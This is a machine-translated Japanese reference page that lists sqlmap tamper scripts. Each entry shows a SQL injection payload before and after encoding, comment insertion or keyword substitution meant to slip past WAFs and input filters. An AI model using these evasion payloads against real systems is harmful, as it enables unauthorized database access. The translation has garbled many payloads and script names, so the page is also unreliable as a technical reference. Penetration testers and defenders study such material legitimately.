一般的な改ざんスクリプトのSQLMAP

その他 2020-02-23 14:09:17 訪問数: null

一般的な改ざんスクリプト


apostrophemask.py
適したデータベース:ALL
効果:単一引用符をフィルタリングするために使用UTF-8での引用符、
使用スクリプトの前に:(「1 AND '1改ざん
スクリプトを使用した後:1%EF%のBCの% 871%のEF%のBCの%87 =


base64encode.py
適したデータベース:ALL
効果:Base64エンコード置き換える
スクリプトを使用する前に:改ざん( "1「AND SLEEP (5)#")
スクリプトの使用:MScgQU5EIFNMRUVQKDUpIw ==

multiplespaces.py
該当するデータベース:ALL
:SQLキーワードの周りに複数のスペースの追加
、タンパ(1 'UNION SELECTのfoob​​arに' ): スクリプトを使用する前に
、スクリプトを使用した後:1 UNION SELECT foob​​arに

space2plus.py
適したデータベース:ALL
効果:とスペースプラス記号を置き換える
スクリプトを使用する前に:改ざん(「ユーザーからのSELECT ID 」)
を使用スクリプトの後:+ユーザーからの+ + IDを選択します

nonrecursivereplacement.py
適したデータベース:ALLの
役割:デュアルクエリとして、二重のSQL文の代替で(空の選択を置き換えるために、例えば、適切な非常に弱いカスタムフィルタ)のキーワードをあらかじめ定義され
たスクリプトを使用する前に:改ざん(「1 UNION SELECT 2--「)
を使用スクリプトの後:1 UNIOUNIONN SELESELECTCT 2--

space2randomblank.py
該当するデータベース:ALLは
、他の有効な文字とスペースを置き換える:役割
のスクリプトを使用する前に:改ざん(「ユーザーからのIDを選択 」)
スクリプトを使用した後は、:%0Did%0DFROM%0Ausersを選択

unionalltounion.py
適したデータベース:ALL
アクション:組合allselectがunionselect交換し
、使用前にスクリプト:改ざん- ( '1 UNION ALL SELECT')
を使用スクリプトの後:-1 UNION SELECT

securesphere.py
適切なデータベース:すべて
効果:特定の文字列が追加され
、使用のスクリプトの前に:タンパ(「1,1 = 1」)
使用スクリプト後:1と1 = 1と「 =「0having」0having」

space2dash.py
適したデータベース:ALLの
アクション:置き換えスペース-とランダムな文字列と改行を追加し
、使用するスクリプトの前に:耐タンパー(「1、9227 = 9227」)
を使用スクリプトの後:1 - nVNaVoPYeva%0AAND- -ngNvzqu%0A9227 = 9227

space2mssqlblank.py
該当するデータベース:Microsoft SQLサーバの
テストデータベースを通じて:Microsoft SQL Server 2000のは、Microsoft SQL Server 2005人の
役割:他のスペース文字( '%01'、 '%02'、'03%のためのランダム置換スペース'' % 04 ' '%05'、 '%06'、 '%07'、 '%08'、 '%09'、 '%の0B'、 '%の0C'、 '%0D'、 '%の0E'、' % 0F '' ')%0Aの
使用スクリプトの前に:耐タンパー('ユーザーからのSELECT ID )」
を使用スクリプトの後:SELECT%0Eid%0DFROM%07users

between.py
テストデータベース:Microsoft SQL Serverの2005年、MySQLの4 、5.0および5.5、Oracle 10gの、PostgreSQLの8.3、8.4、9.0
> 0 AND#の間にない置き換えることによって:効果を
、スクリプトを使用する前に:改ざん(「1、A> B - 「)
を使用スクリプトの後:1、A、NOT 0〜 B--

percentage.py
該当するデータベース:ASP
テストデータベース:Microsoft SQL Server 2000の2005年、 MySQLの5.1.56、5.5.11、PostgreSQLの9.0
:各文字の前に百分の一の追加
のスクリプトを使用する前に:改ざん(「SELECTフィールドFROM TABLE 「)
使用スクリプト後:%S%E%のL%の Eの%のC%T%F%I%のEの%のL%D%F%R%O%M%T%A%Bの%の1%のE

sp_password.py
適切なデータベース:MSSQL
自動処理から追加sp_passwordをペイロードは、T-SQL内のログを混乱:効果
スクリプトを使用する前に:タンパ(「1および9227 = 9227--」)
使用スクリプト後:1、9227 = 9227- - sp_passwordを

charencode.py
テストデータベース:Microsoft SQL Serverの2005年、MySQLの4 、5.0および5.5、Oracle 10gの、PostgreSQLの8.3、8.4、9.0
効果:(文字が既に符号化処理されません)指定されたペイロードのすべての文字はURLエンコードを使用
するスクリプトを使用して前:タンパ( '%FROM選択フィールド 20TABLE')
使用スクリプト後:%53%45%4Cの% 45%43%54%20%46%49%45%4(c)の%44%20%46%52%4F%4D %20%54%41%42 %の4C%45

randomcase.py
テストデータベース:MySQLの4のMicrosoft SQL Server 2005の、 5.0および5.5、Oracle 10gの、PostgreSQLの8.3、8.4、9.0の
役割:ランダムな場合
、スクリプトを使用する前に:改ざん( 'INSERT')
スクリプトを使用した後:INSERT

charunicodeencode.py
該当するデータベース:ASP、ASP.NETの
データベースによるテスト:Microsoft SQL Serverの2000/2005には、MySQL 5.1.56は、PostgreSQLの9.0.3
Unicode文字列のエンコーディングが適用されます:役割
のスクリプトを使用する前に:改ざん(「SELECT FIELD%20FROMをTABLE「)
を使用スクリプトの後:%u0053%u0045%u004C% u0045%u0043%u0054%U0020%u0046%u0049%u0045%u004C%u0044%U0020%u0046%u0052%u004F%u004D%U0020%u0054%u0041%u0042% u004C%u0045

space2comment.py
テストデータベース:Microsoft SQL Serverの2005、MySQLの4 、5.0および5.5、Oracle 10gの、PostgreSQLの8.3、8.4、9.0
置き換えスペース/ ** /:アクション
スクリプトを使用する前に:改ざん( 'ユーザーからのIDを選択します '
スクリプトを使用した後:SELECT / ** / ID / ** / FROM / ** /ユーザー

equaltolike.py
テストデータベース:Microsoft SQL Serverの2005、MySQLの4 、5.0と5.5が
置き換えられます= LIKE:効果
のスクリプトを使用する前に:改ざん( 'ユーザーがSELECT * FROM ID = 1')
スクリプトを使用して:ユーザーSELECT * FROM WHERE ID LIKE 1

equaltolike.py
テストデータベース:MySQLの4、5.0と5.5のOracle 10g、PostgreSQLの8.3、8.4、9.0
役割:>、最大で交換のフィルタをバイパス>
スクリプトを使用してフロント:タンパ( '1、A> B'
スクリプトを使用した後:1かつ最高(A、B + 1)= Aを

ifnull2ifisnull.py
適切なデータベース:MySQLの、SQLiteの(おそらく)、 SAP MaxDBの(おそらく)
テストデータベース:MySQLの5.0および5.5
影響:同様のIFNULL(A、B)は、IF(ISNULL(A)、B置換され 、A)を、IFNULLのフィルタをバイパス
使用スクリプトの前に:タンパ( 'IFNULL(1、 2)')
使用スクリプト後:IF(ISNULL(1)、 2,1)

modsecurityversioned.py
適したデータベース:MySQLの
テストデータベース:MySQLの5.0
役割:フィルタリングスペース、関連する注釈的mysqlの注入を提供し
、タンパ(「1、2> 1-- 」): スクリプトを使用する前に
、スクリプトを使用した後:1 /を* !30874AND 2> 1 * / -

space2mysqlblank.py
該当するデータベース:MySQLの
テストデータベース:MySQLの5.1
役割:他の空白文字で置き換えスペース( '%09'、 '%の 0A'、 '%の0C'、 '%0D'、 '%の0B')
スクリプトを使用して( 'ユーザーからのSELECT ID改ざん:前 ')
を使用スクリプトの後:%0Bid%0DFROM%0Cusersを選択

modsecurityzeroversioned.py
適したデータベース:MySQLの
テストデータベース:MySQLの5.0
役割:(!/ * 00000 * /)のインライン注入を使用して、注釈モード
のタンパ( '1、2> 1-- :') スクリプトを使用する前に
、使用するスクリプトの後: !1 / * 00000AND 2> 1 * / -

space2mysqldash.py
適したデータベース:MySQLの、MSSQLの
アクション:置き換えスペース-と改行文字が続く
使用のスクリプトの前に:耐タンパー( '1、9227 = 9227')
を使用スクリプトの後:1 - %の0AAND - %0A9227 = 9227

bluecoat.py
適したデータベース:ブルーコートSGOS
テストデータベース:MySQLの5.1 ,, SGOSの
アクション:=交換LIKE続く空白の後に有効なランダムなSQL文、とスペースを置き換える
ユーザーからのタンパ(「SELECT ID:スクリプトを使用する前に、ここで、ID = 1「)
使用スクリプト後:IDユーザーからSELECT%の09id LIKE 1

versionedkeywords.py
該当するデータベース:MySQLの
テストデータベース:MySQLの4.0.18、5.1.56、5.5.11
ノートバイパス:役割
のスクリプトを使用する前に:改ざん(「1 UNION ALL SELECT NULL、NULL、CONCAT(CHAR(58,104,116,116,58 )、IFNULL(CAST(CURRENT_USER( )AS CHAR)、CHAR(32))、CHAR(58,100,114,117,58))#「)
スクリプトを使用した後:!!! 1 / * UNION * // * ALL * // SELECT * * // *!NULL * /、 / *!NULL * /、CONCAT(CHAR(58,104,116,116,58)、IFNULL(CAST(CURRENT_USER()/ *!AS * // *!CHAR * /)、CHAR(32) )、CHAR(58,100,114,117,58))#

halfversionedmorekeywords.py
該当するデータベース:MySQLの<5.1
テストデータベース:MySQLの4.0.18 / 5.0.22
役割:各キーワードのMySQLのリリースノートの前に追加
のスクリプトを使用する前に:改ざん(「値「UNION ALL SELECT CONCAT(CHAR(58107112113 、58)、IFNULL(CAST( CURRENT_USER()AS CHAR)、CHAR(32))、CHAR(58,97,110,121,58))、NULL、NULLの#AND 'QDWa' = 'QDWa「)
を使用スクリプトの後に:価値' / *!0UNION / *!0ALL / *!0SELECT / *!0CONCAT(/ *!0CHAR(58,107,112,113,58)、/ *!0IFNULL(CAST(/ *!0CURRENT_USER()/ *!0AS / *!0CHAR)、 / *!0CHAR(32)) 、/ *!0CHAR(58,97,110,121,58))、/ *!0NULL、/ *!0NULL#/ *!0AND 'QDWa' =「QDWa

space2morehash.py
該当するデータベース:MySQLの> = 5.1.13
テストデータベース:MySQLの5.1.41は
#スペースや改行を交換し、ランダムな文字列を追加している:効果
スクリプトを使用する前に:改ざん(「1、9227 = 9227」
スクリプトを使用した後1%23ngNvzqu%0AAND%23nVNaVoPYeva %0A%23lujYFWfv%0A9227 = 9227

apostrophenullencode.py
該当するデータベース:ALLの
目的:不正なバイトのUnicode文字は、単一引用符を置き換える
スクリプトを使用する前に:改ざん(「1 AND '1 ' =「1" )
スクリプトを使用した後:1%00パーセント271パーセント 00パーセント27 = 271パーセント00パーセント

appendnullbyte.py
適切なデータベース:ALL
役割:ペイロードの終了位置のローディングヌルバイト文字コード
の使用スクリプトの前に:タンパ(「1,1 = 1」)
使用スクリプト後:1と1 = 1%00

chardoubleencode.py
該当するデータベース:ALL
与えられたペイロードのためにすべての文字が(エンコードされた文字となっている無治療)をコードしない、二重のURLを使用します。役割
のスクリプトを使用する前に:改ざん(「%FROM SELECT FIELD 20TABLE」)
スクリプトを使用した後:%2553パーセント2545 %254C%の2545%2543パーセント2554 %2520パーセント2546パーセント2549パーセント2545%254Cの%2544パーセント2520パーセント2546パーセント2552パーセント254F%254D%2520パーセント2554パーセント2541パーセント2542パーセントの254Cの%2545

unmagicquotes.py
適したデータベース:ALL
BFと27%の一般的なノートの最後に%を持つ複数のバイトの組み合わせでスペースを置き換える:効果
スクリプトを使用する前に:改ざん(「1「AND 1 = 1" )
スクリプトを使用した後:1%BFの27% AND 1 = 1--

randomcomments.py
適したデータベース:ALL
分割SQLキーワードNotesで:効果
スクリプトを使用する前に:改ざん( 'INSERT')
を使用スクリプトの後:I / ** / N / ** / SERT

おすすめ

転載: www.cnblogs.com/mark0/p/12349551.html
おすすめ
ランキング
Huaxia ERP にユーザー名とパスワードに依存する脆弱性が漏洩 (CNVD-2020-63964)
How to perform image recognition and face comparison in Vue
Linuxの意味2>&1
端末装置とTTY、chvt、startxとコマンド
)(pandas.read_csvのdate_parserパラメータを利用する方法
プロジェクト設定はドメイン間でアクセス可能
SpringBoot2.xの基本:設定ファイルの読み込み順序と優先度のオーバーライド
Kubernetesシステムセキュリティ - アクセス制御
なぜダイハツAPPは、招待コード18818128に登録しました
フロントエンドが習得する必要があるネットワークの知識
アーカイブ
もっと
2024-05-21(36)
2024-05-20(5)
2024-05-19(0)
2024-05-18(30)
2024-05-17(6)
2024-05-16(24)
2024-05-15(5)
2024-05-14(9)
2024-05-13(8)
2024-05-12(27)

コードワールド

© 2018 codetd.com